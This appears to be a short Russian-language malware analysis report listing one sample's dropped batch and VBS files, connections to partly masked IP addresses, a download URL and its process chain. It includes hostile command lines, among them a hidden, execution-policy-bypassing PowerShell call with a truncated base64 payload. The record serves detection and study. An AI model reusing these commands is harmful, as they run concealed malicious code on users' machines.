Техническая информация
- %WINDIR%\temp\cancroidea.bat
- %WINDIR%\temp\bhabar.vbs
- nul
- '10#.#72.132.57':80
- '62.##.208.170':80
- http://10#.#72.132.57/arquivo_ce9a3936c11245e3be450d7f2cd03d68.txt
- ClassName: 'HTML Application Host Window Class' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' //nologo "%WINDIR%\Temp\bhabar.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c "%WINDIR%\Temp\cancroidea.bat" (со скрытым окном)
- '%WINDIR%\syswow64\timeout.exe' /t 1 /nobreak
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w hidden -noprofile -ep bypass -c "$b64='JGxpYmVsZXIgPSAnVmtGSic7JGxvb3NlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGxpYmVsZXIpOyRzaWx1cm9pZGVpID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVR... (со скрытым окном)